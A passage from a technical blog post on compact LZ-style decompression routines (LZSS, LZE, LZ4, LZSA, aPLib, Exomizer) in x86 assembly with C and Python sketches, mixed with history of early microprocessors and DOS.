        lodsb                    ; c->w = *c->in++;
        adc    al, al
    lzss_check_bit:
        jc     read_pair         ; if bit set, read len,offset
        
        movsb                    ; *out++ = *c.in++;
        jmp    lzss_main
    read_pair:
        movzx  edx, word[esi]    ; ofs = *(uint16_t*)c.in;
        add    esi, 2            ; c.in += 2;
        mov    ecx, edx          ; len = (ofs % LEN_SIZE) + LEN_MIN;
        and    ecx, 15           ;
        add    ecx, 3            ;
        shr    edx, 4            ; ofs >>= 4
        push   esi
        lea    esi, [edi-1]      ; ptr = out - ofs - 1;
        sub    esi, edx          ;
        rep    movsb             ; while(len--) *out++ = *ptr++;
        pop    esi
        jmp    lzss_main
    lzss_exit:
        ; return (out - (uint8_t*)outbuf);
        sub    edi, [esp+32+4]
        mov    [esp+28], edi
        popad
        ret
    

    7. Lempel-Ziv-Bell (LZB)

    Designed by Tim Bell and described in his 1986 Ph.D. dissertation A Unifying Theory and Improvements for Existing Approaches to Text Compression. It uses a pre-processor based on LZSS and Elias gamma coding of the match length, which results in a compression ratio similar to LZH and LZARI by Okumura. However, it does not suffer the performance penalty of using Huffman or arithmetic coding. Introspec considers it to be the first implementation that uses variable-length coding for reference matches, which is the basis for most modern LZ77-style compressors.

    Bell’s thesis was a key exhibit in a $300 million lawsuit brought by Stac Electronics (SE) against Microsoft. The 1993 case centered around a disk compression utility included with MS-DOS 6.0 called DoubleSpace. SE accused Microsoft of patent violations by using the same compression technologies used in its Stacker product. The court agreed, and SE was awarded $120 million in compensatory damages.

    8. Intel 8088 / 8086

    For many years, bigger nerds than myself would remind me of what a mediocre architecture the x86 is and that it didn’t deserve to be the most popular CPU for personal computers. But if it’s so bad, how did it become the predominant architecture? It probably commenced in the 1970s with the release of the 8080, and an operating system designed for it by Gary Kildall called Control Program Monitor or Control Program for Microcomputers (CP/M).

    Year | Model | Data Width (bits) | Address Width (bits)
    1971 | 4004 | 4 | 12
    1972 | 8008 | 8 | 14
    1974 | 4040 | 4 | 12
    1974 | 8080 | 8 | 16
    1976 | 8085 | 8 | 16
    1978 | 8086 | 16 | 20
    1979 | 8088 | 8 | 20

    Kildall initially designed and developed CP/M for the 8-Bit 8080 and licensed it to run on devices such as the IMSAI 8080 (seen in the movie WarGames). Kildall was motivated by the enormous potential for microcomputers to become regular home appliances. And when IBM wanted to build a microcomputer of its own in 1980, CP/M was the most successful operating system on the market.

    IBM made two decisions: reuse the existing software and hardware of the 8085-based IBM System/23 by choosing the 8088 instead of the 8086 (the cost per CPU unit was also a factor), and have its product run CP/M to remain competitive with other microcomputers on the market.

    Regrettably, Kildall missed a unique opportunity to supply CP/M for the IBM Personal Computer. Instead, Bill Gates / Microsoft obtained licensing to use a cloned version of CP/M called the Quick and Dirty Operating System (QDOS). QDOS was later rebranded to 86-DOS, before being shipped with the first IBM PC as “IBM PC DOS”. Microsoft later purchased 86-DOS, rebranded it Microsoft Disk Operating System (MS-DOS), and forced IBM into a licensing agreement so Microsoft were free to sell MS-DOS to other companies. Kildall would later remark in his unpublished memoir, Computer Connections: People, Places, and Events in the Evolution of the Personal Computer Industry, that “Gates is more an opportunist than a technical type and severely opinionated even when the opinion he holds is absurd.”

    8.1 LZE

    Designed by Fabrice Bellard in 1989 and included in his closed-source MS-DOS packer LZEXE. It was inspired by LZSS but provides a higher compression ratio. Hiroaki Goto reverse engineered this in 1995 and published an open-source implementation in 2008. The following is a 32-Bit translation of the 16-Bit decoder with some additional optimizations. There’s also a 68K version for anyone interested and a Z80 version by Kei Moroboshi published in 2017.

    lze_depack:
    _lze_depack:
        pushad
        mov    edi, [esp+32+4] ; edi = out
        mov    esi, [esp+32+8] ; esi = in
        
        call   init_get_bit
    lze_get_bit:  
        add    dl, dl            ; 
        jnz    exit_get_bit
        
        mov    dl, [esi]         ; dl = *src++;
        inc    esi
        rcl    dl, 1
    exit_get_bit:
        ret
    init_get_bit:
        pop    ebp
        mov    dl, 128
    lze_cl:
        movsb
    lze_main:
        call   ebp               ; if(get_bit()) continue;
        jc     lze_cl
        
        call   ebp               ; if(get_bit()) {
        jc     lze_copy3
        
        xor    ecx, ecx          ; len = 0
        
        call   ebp               ; get_bit()
        adc    ecx, ecx
        
        call   ebp               ; get_bit()
        adc    ecx, ecx
        
        lodsb                    ; a.b[0] = *in++;
        mov    ah, -1            ; a.b[1] = 0xFF;
    lze_copy1:
        inc    ecx               ; len++;
        jmp    lze_copy2
    lze_copy3:                   ; else
        lodsw
        xchg   al, ah
        mov    ecx, eax
        shr    eax, 3            ; ofs /= 8
        or     ah, 0e0h
        and    ecx, 7            ; len %= 8
        jnz    lze_copy1
        mov    cl, [esi]         ; len = *src++;
        inc    esi
        ; EOF?
        jecxz  lze_exit          ; if(len == 0) break;
    lze_copy2:
        movsx  eax, ax
        push   esi
        lea    esi, [edi+eax]
        inc    ecx
        rep    movsb
        pop    esi
        jmp    lze_main
        ; return (out - (uint8_t*)outbuf);
    lze_exit:
        sub    edi, [esp+32+4]
        mov    [esp+28], edi
        popad
        ret
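
    For readers who find C easier to follow, here is a sketch of the same decoder derived from my reading of the assembly above, not from Goto's source. The names lze_ctx, lze_get_bit and lze_depack_c are hypothetical, and there are no bounds checks.

```c
#include <assert.h>
#include <stdint.h>

typedef struct { const uint8_t *in; uint8_t queue; } lze_ctx;

// Read one flag bit, MSB first. The queue carries a sentinel 1 bit, so it
// only becomes zero once all eight flag bits have been consumed.
static int lze_get_bit(lze_ctx *c) {
    int bit = c->queue >> 7;
    c->queue = (uint8_t)(c->queue << 1);
    if (c->queue == 0) {
        uint8_t x = *c->in++;               // refill from the input stream
        bit = x >> 7;
        c->queue = (uint8_t)((x << 1) | 1);
    }
    return bit;
}

static uint32_t lze_depack_c(void *outbuf, const void *inbuf) {
    uint8_t *out = (uint8_t *)outbuf;
    lze_ctx c = { (const uint8_t *)inbuf, 128 };
    assert(out && c.in);

    *out++ = *c.in++;                       // first byte is always a literal
    for (;;) {
        int32_t ofs;
        uint32_t len;

        if (lze_get_bit(&c)) {              // 1: literal
            *out++ = *c.in++;
            continue;
        }
        if (lze_get_bit(&c)) {              // 01: long match, big-endian word
            uint32_t v = ((uint32_t)c.in[0] << 8) | c.in[1];
            c.in += 2;
            ofs = (int32_t)(v >> 3) - 0x2000;   // 13-bit negative offset
            len = v & 7;
            if (len == 0) {
                len = *c.in++;              // a separate length byte follows
                if (len == 0) break;        // zero marks the end of the stream
                len += 1;
            } else {
                len += 2;
            }
        } else {                            // 00: short match
            len  = (uint32_t)lze_get_bit(&c) << 1;
            len |= (uint32_t)lze_get_bit(&c);
            len += 2;                       // 2 to 5 bytes
            ofs = (int32_t)*c.in++ - 0x100; // 8-bit negative offset
        }
        const uint8_t *ptr = out + ofs;
        while (len--) *out++ = *ptr++;
    }
    return (uint32_t)(out - (uint8_t *)outbuf);
}
```

    The hand-built stream 41 92 42 FE 00 00 00 decodes to "ABABAB": a literal A, a flag byte, a literal B, a short match of four bytes at offset -2, and an end marker.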
    

    8.2 LZ4

    Designed by Yann Collet and published in 2011. LZ4 is fast for both compression and decompression with a small decoder. Speed is somewhere between DEFLATE and LZO, while the compression ratio is similar to LZO but worse than DEFLATE. Despite the compression ratio being worse than DEFLATE, LZ4 doesn’t require a Huffman or arithmetic/range decoder. The following 32-Bit code is a conversion of the 8088/8086 implementation by Trixter. Jørgen Ibsen has implemented LZ4 with optimal parsing using BriefLZ algorithms.

    lz4_depack:
    _lz4_depack:
        pushad
        lea     esi,[esp+32+4]
        lodsd                   ;load target buffer
        xchg    eax,edi
        lodsd
        xchg    eax,ebx         ;BX = chunk length minus header
        lodsd                   ;load source buffer
        xchg    eax,esi
        add     ebx,esi         ;BX = threshold to stop decompression
        xor     ecx,ecx
    @@parsetoken:               ;CX=0 here because of REP at end of loop
        mul     ecx
        lodsb                   ;grab token to AL
        mov     dl,al           ;preserve packed token in DX
    @@copyliterals:
        shr     al,4            ;unpack upper 4 bits
        call    buildfullcount  ;build full literal count if necessary
    @@doliteralcopy:            ;src and dst might overlap so do this by bytes
        rep     movsb           ;if cx=0 nothing happens
    ;At this point, we might be done; all LZ4 data ends with five literals and the
    ;offset token is ignored.  If we're at the end of our compressed chunk, stop.
        cmp     esi,ebx         ;are we at the end of our compressed chunk?
        jae     done            ;if so, jump to exit; otherwise, process match
    @@copymatches:
        lodsw                   ;AX = match offset
        xchg    edx,eax         ;AX = packed token, DX = match offset
        and     al,0Fh          ;unpack match length token
        call    buildfullcount  ;build full match count if necessary
    @@domatchcopy:
        push    esi             ;ds:si saved, xchg with ax would destroy ah
        mov     esi,edi
        sub     esi,edx
        add     ecx,4           ;minmatch = 4
                                ;Can't use MOVSWx2 because [es:di+1] is unknown
        rep     movsb           ;copy match run if any left
        pop     esi
        jmp     @@parsetoken
    buildfullcount:
                                ;CH has to be 0 here to ensure AH remains 0
        cmp     al,0Fh          ;test if unpacked literal length token is 15?
        xchg    ecx,eax         ;CX = unpacked literal length token; flags unchanged
        jne     builddone       ;if AL was not 15, we have nothing to build
    buildloop:
        lodsb                   ;load a byte
        add     ecx,eax         ;add it to the full count
        cmp     al,0FFh         ;was it FF?
        je      buildloop       ;if so, keep going
    builddone:
        ret
    done:
        sub     edi,[esp+32+4];subtract original offset from where we are now
        mov     [esp+28], edi
        popad
        ret
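
    The same block decoding loop can be sketched in C. This follows the structure of the assembly above rather than the reference LZ4 library; lz4_length and lz4_depack_c are hypothetical names, the arguments mirror the assembly (output buffer, compressed length, input buffer), and there are no bounds checks.

```c
#include <assert.h>
#include <stdint.h>

// A length nibble of 15 is extended by adding bytes until one is not 255.
static uint32_t lz4_length(uint32_t nibble, const uint8_t **in) {
    uint32_t len = nibble, b;
    if (nibble == 15) {
        do { b = *(*in)++; len += b; } while (b == 255);
    }
    return len;
}

static uint32_t lz4_depack_c(void *outbuf, uint32_t inlen, const void *inbuf) {
    const uint8_t *in = (const uint8_t *)inbuf, *end = in + inlen;
    uint8_t *out = (uint8_t *)outbuf;
    assert(inlen > 0);

    for (;;) {
        uint32_t token = *in++;
        uint32_t len = lz4_length(token >> 4, &in);    // literal run
        while (len--) *out++ = *in++;
        if (in >= end) break;                          // last sequence has no match

        uint32_t ofs = in[0] | ((uint32_t)in[1] << 8); // little-endian offset
        in += 2;
        len = lz4_length(token & 15, &in) + 4;         // minmatch = 4
        const uint8_t *ptr = out - ofs;
        while (len--) *out++ = *ptr++;                 // bytewise: may overlap
    }
    return (uint32_t)(out - (uint8_t *)outbuf);
}
```

    For example, the 11-byte block 20 61 62 02 00 50 63 64 65 66 67 holds two literals, a four-byte match at offset 2, and a final run of five literals, and decodes to "abababcdefg".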
    

    8.3 LZSA

    Designed by Emmanuel Marty with participation from Introspec and published in 2018. Introspec explains the difference between the two formats, LZSA1 and LZSA2.

    LZSA1 is designed to directly compete with LZ4. If you compress using “lzsa -f1 -r INPUT OUTPUT”, you are very likely to get higher compression ratio than LZ4 and probably slightly lower decompression speed compared to LZ4 (I am comparing speeds of LZSA1 fast decompressor and LZ4 fast decompressor, both hand-tuned by myself). If you really want to compete with LZ4 on speed, you need to compress using one of the “boost” options “lzsa -f1 -r -m4 INPUT OUTPUT” (better ratio, similar speed to LZ4) or “lzsa -f1 -r -m5 INPUT OUTPUT” (similar ratio, faster decompression than LZ4).

    LZSA2 is approximately in the same league as BitBuster or ZX7. It’s likely to be worse if you’re compressing pure graphics (at least this is what we are seeing on ZX Spectrum), but it has much larger window and is pretty decent at compressing mixed data (e.g. a complete game binary or something similar). We accepted that the compression ratio is not the best because we wanted to preserve some of its speed. You should expect LZSA2 to decompress data about 50% faster than best I can do for ZX7. I did not do tests on BitBuster, but I just had a look at decompressor for ver.1.2 and there is no way it can compete with LZSA2 on speed.

    lzsa1_decompress:
    _lzsa1_decompress:
        pushad
        
        mov    edi, [esp+32+4]    ; edi = outbuf
        mov    esi, [esp+32+8]    ; esi = inbuf
        
        xor    ecx, ecx
    .decode_token:
        mul    ecx
        lodsb                     ; read token byte: O|LLL|MMMM
        mov    dl, al             ; keep token in dl
       
        and    al, 070H           ; isolate literals length in token (LLL)
        shr    al, 4              ; shift literals length into place
    
        cmp    al, 07H            ; LITERALS_RUN_LEN?
        jne    .got_literals      ; no, we have the full literals count from the token, go copy
    
        lodsb                     ; grab extra length byte
        add    al, 07H            ; add LITERALS_RUN_LEN
        jnc    .got_literals      ; if no overflow, we have the full literals count, go copy
        jne    .mid_literals
    
        lodsw                     ; grab 16-bit extra length
        jmp    .got_literals
    
    .mid_literals:
        lodsb                     ; grab single extra length byte
        inc    ah                 ; add 256
    
    .got_literals:
        xchg   ecx, eax
        rep    movsb              ; copy cx literals from ds:si to es:di
    
        test   dl, dl             ; check match offset size in token (O bit)
        js     .get_long_offset
    
        dec     ecx
        xchg    eax, ecx          ; clear ah - cx is zero from the rep movsb above
        lodsb
        jmp     .get_match_length
    
    .get_long_offset:
        lodsw                     ; Get 2-byte match offset
    
    .get_match_length:
        xchg    eax, edx          ; edx: match offset  eax: original token
        and     al, 0FH           ; isolate match length in token (MMMM)
        add     al, 3             ; add MIN_MATCH_SIZE
    
        cmp     al, 012H          ; MATCH_RUN_LEN?
        jne     .got_matchlen     ; no, we have the full match length from the token, go copy
    
        lodsb                     ; grab extra length byte
        add     al,012H           ; add MIN_MATCH_SIZE + MATCH_RUN_LEN
        jnc     .got_matchlen     ; if no overflow, we have the entire length
        jne     .mid_matchlen       
    
        lodsw                     ; grab 16-bit length
        test    eax, eax          ; bail if we hit EOD
        je      .done_decompressing 
        jmp     .got_matchlen
    
    .mid_matchlen:
        lodsb                     ; grab single extra length byte
        inc     ah                ; add 256
    
    .got_matchlen:
        xchg    ecx, eax          ; copy match length into ecx
        xchg    esi, eax          
        mov     esi, edi          ; esi now points at back reference in output data
        movsx   edx, dx           ; sign-extend dx to 32-bits.
        add     esi, edx
        rep     movsb             ; copy match
        xchg    esi, eax          ; restore esi
        jmp     .decode_token     ; go decode another token
    
    .done_decompressing:
        sub    edi, [esp+32+4]
        mov    [esp+28], edi      ; eax = decompressed size
        popad
        ret                       ; done
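
    As with the other formats, a C rendering may make the token layout easier to follow. The sketch below is my reading of the assembly above, not the reference LZSA code; lzsa1_extend and lzsa1_depack_c are hypothetical names, and there are no bounds checks.

```c
#include <assert.h>
#include <stdint.h>

// Extend a saturated length field. `base` is the saturated value (7 for
// literals, 18 for matches); one extra byte is added to it first.
static uint32_t lzsa1_extend(uint32_t base, const uint8_t **in) {
    uint32_t len = base + *(*in)++;
    if (len == 256) {                       // sum wrapped to zero: 16-bit value follows
        len = (*in)[0] | ((uint32_t)(*in)[1] << 8);
        *in += 2;
    } else if (len > 256) {                 // sum wrapped past zero: 256 + next byte
        len = 256 + *(*in)++;
    }
    return len;
}

static uint32_t lzsa1_depack_c(void *outbuf, const void *inbuf) {
    const uint8_t *in = (const uint8_t *)inbuf;
    uint8_t *out = (uint8_t *)outbuf;
    assert(in && out);

    for (;;) {
        uint32_t token = *in++;             // O|LLL|MMMM
        uint32_t len = (token >> 4) & 7;    // literal count (LLL)
        if (len == 7) len = lzsa1_extend(7, &in);
        while (len--) *out++ = *in++;

        int32_t ofs;                        // offsets are stored as negative values
        if (token & 0x80) {                 // O = 1: 16-bit offset, sign-extended
            uint32_t w = in[0] | ((uint32_t)in[1] << 8);
            in += 2;
            ofs = (int32_t)w - ((w & 0x8000) ? 0x10000 : 0);
        } else {                            // O = 0: 8-bit offset
            ofs = (int32_t)*in++ - 256;
        }
        len = (token & 15) + 3;             // MMMM plus the minimum match of 3
        if (len == 18) {
            len = lzsa1_extend(18, &in);
            if (len == 0) break;            // a 16-bit zero marks end of data
        }
        const uint8_t *ptr = out + ofs;
        while (len--) *out++ = *ptr++;
    }
    return (uint32_t)(out - (uint8_t *)outbuf);
}
```

    The hand-built stream 21 61 62 FE 0F 00 EE 00 00 decodes to "ababab": two literals, a four-byte match at offset -2, then a token whose match length extends to a 16-bit zero.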
    

    8.4 aPLib

    Designed by Jørgen Ibsen and published in 1998, it remains a closed-source compressor. Fortunately, an open-source version of the compressor called aPUltra is available, which was released by Emmanuel Marty in 2019. The small decompressor in x86 assembly follows.

    apl_decompress:
    _apl_decompress:
        pushad
    
        %ifdef CDECL
          mov    esi, [esp+32+4]  ; esi = aPLib compressed data
          mov    edi, [esp+32+8]  ; edi = output
        %endif
        
        ; === register map ===
        ;  al: bit queue
        ;  ah: unused, but value is trashed
        ; ebx: follows_literal
        ; ecx: scratch register for reading gamma2 codes and storing copy length
        ; edx: match offset (and rep-offset)
        ; esi: input (compressed data) pointer
        ; edi: output (decompressed data) pointer
        ; ebp: offset of .get_bit 
               
        mov     al,080H         ; clear bit queue(al) and set high bit to move into carry
        xor     edx, edx        ; invalidate rep offset in edx
    
        call    .init_get_bit
    .get_dibits:
        call    ebp             ; read data bit
        adc     ecx,ecx         ; shift into cx
    .get_bit:
        add     al,al           ; shift bit queue, and high bit into carry
        jnz     .got_bit        ; queue not empty, bits remain
        lodsb                   ; read 8 new bits
        adc     al,al           ; shift bit queue, and high bit into carry
    .got_bit:
        ret
    .init_get_bit:
        pop     ebp             ; load offset of .get_bit, to be used with call ebp
        add     ebp, .get_bit - .get_dibits
    .literal:
        movsb                   ; read and write literal byte
    .next_command_after_literal:
        push    03H
        pop     ebx             ; set follows_literal(bx) to 3
        
    .next_command:
        call    ebp             ; read 'literal or match' bit
        jnc     .literal        ; if 0: literal
                                
                                ; 1x: match
        call    ebp             ; read '8+n bits or other type' bit
        jc      .other          ; 11x: other type of match
                                ; 10: 8+n bits match
        call    .get_gamma2     ; read gamma2-coded high offset bits
        sub     ecx,ebx         ; high offset bits == 2 when follows_literal == 3 ?
                                ; (a gamma2 value is always >= 2, so subtracting follows_literal when it
                                ; is == 2 will never result in a negative value)
        jae     .not_repmatch   ; if not, not a rep-match
        call    .get_gamma2     ; read match length
        jmp     .got_len        ; go copy
    .not_repmatch:
        mov     edx,ecx         ; transfer high offset bits to dh
        shl     edx,8
        mov     dl,[esi]        ; read low offset byte in dl
        inc     esi
        call    .get_gamma2     ; read match length
        cmp     edx,7D00H       ; offset >= 32000 ?
        jae     .increase_len_by2 ; if so, increase match len by 2
        cmp     edx,0500H       ; offset >= 1280 ?
        jae     .increase_len_by1 ; if so, increase match len by 1
        cmp     edx,0080H       ; offset < 128 ?
        jae     .got_len        ; if so, increase match len by 2, otherwise it would be a 7+1 copy
    .increase_len_by2:
        inc     ecx             ; increase length
    .increase_len_by1:
        inc     ecx             ; increase length
        ; copy ecx bytes from match offset edx
    .got_len:
        push    esi             ; save esi (current pointer to compressed data)
        mov     esi,edi         ; point to destination in edi - offset in edx
        sub     esi,edx
        rep     movsb           ; copy matched bytes
        pop     esi             ; restore esi
        mov     bl,02H          ; set follows_literal to 2 (ebx is unmodified by match commands)
        jmp     .next_command
        ; read gamma2-coded value into ecx
    .get_gamma2:
        xor     ecx,ecx         ; initialize to 1 so that value will start at 2
        inc     ecx             ; when shifted left in the adc below
    .gamma2_loop:
        call    .get_dibits     ; read data bit, shift into cx, read continuation bit
        jc      .gamma2_loop    ; loop until a zero continuation bit is read
        ret
        ; handle 7 bits offset + 1 bit len or 4 bits offset / 1 byte copy
    .other:
        xor     ecx,ecx
        call    ebp             ; read '7+1 match or short literal' bit
        jc      .short_literal  ; 111: 4 bit offset for 1-byte copy
                                ; 110: 7 bits offset + 1 bit length
                                
        movzx   edx,byte[esi]   ; read offset + length in dl
        inc     esi
        inc     ecx             ; prepare cx for length below
        shr     dl,1            ; shift len bit into carry, and offset in place
        je      .done           ; if zero offset: EOD
        adc     ecx,ecx         ; len in cx: 1*2 + carry bit = 2 or 3
        jmp     .got_len
        ; 4 bits offset / 1 byte copy
    .short_literal:
        call    .get_dibits     ; read 2 offset bits
        adc     ecx,ecx
        call    .get_dibits     ; read 2 offset bits
        adc     ecx,ecx
        xchg    eax,ecx         ; preserve bit queue in cx, put offset in ax
        jz      .write_zero     ; if offset is 0, write a zero byte
                                ; short offset 1-15
        mov     ebx,edi         ; point to destination in es:di - offset in ax
        sub     ebx,eax         ; we trash bx, it will be reset to 3 when we loop
        mov     al,[ebx]        ; read byte from short offset
    .write_zero:
        stosb                   ; copy matched byte
        xchg    eax,ecx         ; restore bit queue in al
        jmp     .next_command_after_literal
    .done:
        sub     edi, [esp+32+8] ; compute decompressed size
        mov     [esp+28], edi
        popad
        ret
    

    9. MOS Technology 6502

    This 8-Bit CPU was the product of Motorola management ignoring customer concerns about the cost of the 6800 CPU launched by the company in 1974. Following consultations with potential customers for the 6800, Chuck Peddle tried to convince Motorola to develop a low-cost alternative for consumers on a limited budget.

    Motorola ordered Peddle to cease working on this idea, which resulted in his departure from the company along with several other employees, who began working on the 6502 at MOS Technology. The 6502 went on to be used in the Commodore 64, the Apple II, and the BBC Micro home computers, as well as various gaming consoles. Motorola acknowledged missing a golden opportunity and would later express regret for dismissing Peddle’s idea since the 6502 was far more successful than the 6800.

    Trivia: The Terminator movie from 1984 uses CPU instructions from the 6502. 🙂

    Those of you that want to program a Commodore 64 without purchasing one can always use an emulator like VICE. For the Apple II, there’s AppleWin. (Yes, Windows only). Since Qkumba already implemented several popular depackers for 6502, I requested a translation of the Exomizer compression algorithm. Using this translation, I created the following table, which lists 6502 instructions and their equivalent for x86. The EBX and ECX registers replace the X and Y registers, respectively. Using #$80 as an immediate value is simply for demonstration, and you’ll find a full list of instructions here.

    6502 | x86 | Description
    lda #$80 | mov al, 0x80 | Load byte into accumulator.
    sta [address] | mov [address], al | Store accumulator in memory.
    cmp #$80 | cmp al, 0x80 | Compare byte with accumulator.
    cpx #$80 | cmp bl, 0x80 | Compare byte with X.
    cpy #$80 | cmp cl, 0x80 | Compare byte with Y.
    asl | shl al, 1 | ASL shifts all bits left one position. 0 is shifted into bit 0 and the original bit 7 is shifted into the Carry.
    lsr | shr al, 1 | Logical shift right.
    bit #$7 | test al, 7 | Perform a bitwise AND, set the flags and discard the result.
    sec | stc | SEt the Carry flag.
    adc #$80 | adc al, 0x80 | Add byte with Carry.
    sbc #$1 | sbb al, 1 | Subtract byte with Carry.
    rts | ret | Return from subroutine.
    jsr | call | Save next address and jump to subroutine.
    eor #$80 | xor al, 0x80 | Perform an exclusive OR.
    ora #$80 | or al, 0x80 | Perform a bitwise OR.
    and #$80 | and al, 0x80 | Bitwise AND with accumulator.
    rol | rcl al, 1 | Shifts all bits left one position. The Carry is shifted into bit 0 and the original bit 7 is shifted into the Carry.
    ror | rcr al, 1 | Shifts all bits right one position. The Carry is shifted into bit 7 and the original bit 0 is shifted into the Carry.
    bpl | jns | Branch on PLus. Jump if Not Signed.
    bmi | js | Branch on MInus. Jump if Signed.
    bcc:bcs | jnc:jc | Branch on Carry Clear. Branch on Carry Set.
    bne:beq | jne:je | Branch on Not Equal. Branch on EQual.
    bvc:bvs | jno:jo | Branch on oVerflow Clear. Branch on oVerflow Set.
    php | pushf | PusH Processor status.
    plp | popf | PuLl Processor status.
    pha | push eax | PusH Accumulator.
    pla | pop eax | PuLl Accumulator.
    tax | movzx ebx, al / mov bl, al | Transfer A to X.
    tay | movzx ecx, al / mov cl, al | Transfer A to Y.
    txa | mov al, bl | Transfer X to A.
    tya | mov al, cl | Transfer Y to A.
    inx | inc ebx / inc bl | INcrement X.
    iny | inc ecx / inc cl | INcrement Y.
    dex | dec ebx / dec bl | DEcrement X.
    dey | dec ecx / dec cl | DEcrement Y.
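
    The shift and rotate rows are the easiest to get wrong, because the 6502 rol and ror rotate through the Carry and therefore correspond to x86 rcl and rcr rather than x86 rol and ror. The following sketch models only the accumulator and Carry flag to show the difference; the cpu6502 structure and the op_ names are made up for this example.

```c
#include <assert.h>
#include <stdint.h>

typedef struct { uint8_t a; uint8_t carry; } cpu6502;  // accumulator and C flag only

// asl: bit 7 goes to Carry, 0 enters bit 0 (x86: shl al, 1)
static void op_asl(cpu6502 *c) { c->carry = c->a >> 7; c->a = (uint8_t)(c->a << 1); }

// lsr: bit 0 goes to Carry, 0 enters bit 7 (x86: shr al, 1)
static void op_lsr(cpu6502 *c) { c->carry = c->a & 1; c->a >>= 1; }

// rol: old Carry enters bit 0, bit 7 goes to Carry (x86: rcl al, 1)
static void op_rol(cpu6502 *c) {
    assert(c->carry <= 1);
    uint8_t in = c->carry;
    c->carry = c->a >> 7;
    c->a = (uint8_t)((c->a << 1) | in);
}

// ror: old Carry enters bit 7, bit 0 goes to Carry (x86: rcr al, 1)
static void op_ror(cpu6502 *c) {
    assert(c->carry <= 1);
    uint8_t in = c->carry;
    c->carry = c->a & 1;
    c->a = (uint8_t)((c->a >> 1) | (in << 7));
}
```

    Starting with A = $80 and Carry clear, asl leaves A = 0 with Carry set, and a following rol moves that Carry into bit 0, giving A = 1 with Carry clear. The bit queues in the decoders above rely on this pattern.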

    9.1 Exomizer

    Designed by Magnus Lind and published in 2002. Exomizer is popular for devices such as the Commodore VIC20, the C64, the C16/plus4, the C128, the PET 4032, the Atari 400/800 XL/XE, the Apple II+e, the Oric-1, the Oric Atmos, and the BBC Micro B. It inspired the development of other executable compressors, most notably PackFire. Qkumba was kind enough to provide a translation of the Exomizer 3 decoder from 6502 to x86. However, due to the complexity of the source code, only a snippet of code is shown here. The Y register maps to the EDI register while the X register maps to the ESI register.

    %MACRO mac_get_bits 0
            call get_bits                   ;jsr get_bits
    %ENDM
    get_bits:
            adc  al, 0x80                   ;adc #$80                ; needs c=0, affects v
            pushfd
            shl  al, 1                      ;asl
            lahf
            jns  gb_skip                    ;bpl gb_skip
    gb_next:
            shl  byte [zp_bitbuf], 1        ;asl zp_bitbuf
            jne  gb_ok                      ;bne gb_ok
            mac_refill_bits                 ;+mac_refill_bits
    gb_ok:
            rcl  al, 1                      ;rol
            lahf
            test al, al
            js   gb_next                    ;bmi gb_next
    gb_skip:
            popfd
            sahf
            jo   gb_get_hi                  ;bvs gb_get_hi
            ret                             ;rts
    gb_get_hi:
            stc                             ;sec
            mov  [zp_bits_hi], al           ;sta zp_bits_hi
            jmp  get_crunched_byte          ;jmp get_crunched_byte
    %ENDIF
    ; -------------------------------------------------------------------
    ; calculate tables (62 bytes) + get_bits macro
    ; x and y must be #0 when entering
    ;
            clc                             ;clc
    table_gen:
            movzx esi, al                   ;tax
            mov   eax, edi                  ;tya
            and   al, 0x0f                  ;and #$0f
            mov   [edi + tabl_lo], al       ;sta tabl_lo,y
            je    shortcut                  ;beq shortcut            ; start a new sequence
    ; -------------------------------------------------------------------
            mov   eax, esi                  ;txa
            adc   al, [edi + tabl_lo - 1]   ;adc tabl_lo - 1,y
            mov   [edi + tabl_lo], al       ;sta tabl_lo,y
            mov   al, [zp_len_hi]           ;lda zp_len_hi
            adc   al, [edi + tabl_hi - 1]   ;adc tabl_hi - 1,y
    shortcut:
            mov   [edi + tabl_hi], al       ;sta tabl_hi,y
    ; -------------------------------------------------------------------
            mov   al, 0x01                  ;lda #$01
            mov   [zp_len_hi], al           ;sta <zp_len_hi
            mov   al, 0x78                  ;lda #$78                ; %01111000
            mac_get_bits                    ;+mac_get_bits
    ; -------------------------------------------------------------------
            shr   al, 1                     ;lsr
            movzx esi, al                   ;tax
            je    rolled                    ;beq rolled
            pushfd                          ;php
    rolle:
            shl  byte [zp_len_hi],1         ;asl zp_len_hi
            stc                             ;sec
            rcr  al, 1                      ;ror
            dec  esi                        ;dex
            jne  rolle                      ;bne rolle
            popfd                           ;plp
    rolled:
            rcr  al, 1                      ;ror
            mov  [edi + tabl_bi], al        ;sta tabl_bi,y
            test al, al
            js   no_fixup_lohi              ;bmi no_fixup_lohi
            mov  al, [zp_len_hi]            ;lda zp_len_hi
            mov  ebx, esi
            mov  [zp_len_hi], bl            ;stx zp_len_hi
            jmp  skip_fix                   ;!BYTE $24
    no_fixup_lohi:
            mov  eax, esi                   ;txa
    ; -------------------------------------------------------------------
    skip_fix:
            inc  edi                        ;iny
            cmp  edi, encoded_entries       ;cpy #encoded_entries
            jne  table_gen                  ;bne table_gen
    

    9.2 Pucrunch

    Designed by Pasi Ojala and published in 1997. The author describes it as a hybrid LZ77 and RLE compressor that uses Elias gamma coding for the reference length and a mixture of gamma and linear code for the offset. It requires no additional memory for decompression. The description and source code are well worth a read for anyone who wants to understand the characteristics of other LZ77-style compressors.
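
    Elias gamma coding comes up repeatedly in this post, so a small illustration may help. The Python sketch below shows the textbook form of the code, in which a positive integer is written as a run of zeros followed by its binary digits. Pucrunch's own bit conventions may differ, and the function names are invented for this example.

```python
def gamma_encode(n):
    """Return the textbook Elias gamma code of n (n >= 1) as a bit string."""
    if n < 1:
        raise ValueError("Elias gamma only encodes positive integers")
    digits = bin(n)[2:]                  # binary digits, leading 1 included
    return "0" * (len(digits) - 1) + digits


def gamma_decode(bits):
    """Decode one Elias gamma code from the start of a bit string."""
    stream = iter(bits)
    zeros = 0
    while next(stream) == "0":           # count zeros up to the leading 1
        zeros += 1
    value = 1                            # the leading 1 just consumed
    for _ in range(zeros):               # then read that many more bits
        value = (value << 1) | int(next(stream))
    return value


print(gamma_encode(5))                   # 5 is 101 in binary, two zeros in front
print(gamma_decode("00101"))
```

    Small values get short codes, which suits match lengths because short matches are far more common than long ones.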

    10. Zilog 80

    “I was able to design whatever I wanted. And personally I wanted to develop the best and the most wonderful 8-Bit microprocessor in the world.” Masatoshi Shima

    After helping to design microprocessors at Intel (the 4-Bit 4004 and the 8-Bit 8008 and 8080), Ralph Ungermann and Federico Faggin left in 1974 to form Zilog. Masatoshi Shima, who also worked at Intel, joined the company in 1975 to work on an 8-Bit CPU they called the Z80, which was released in 1976. The Z80 is essentially a clone of the Intel 8080 with support for more instructions, more registers, and 16-Bit capabilities. Many of the Z80 instructions, to the best of my knowledge, do not have an equivalent on the x86. Proceed with caution: I have no prior experience writing for the Z80, so some of the mappings presented here may be incorrect.

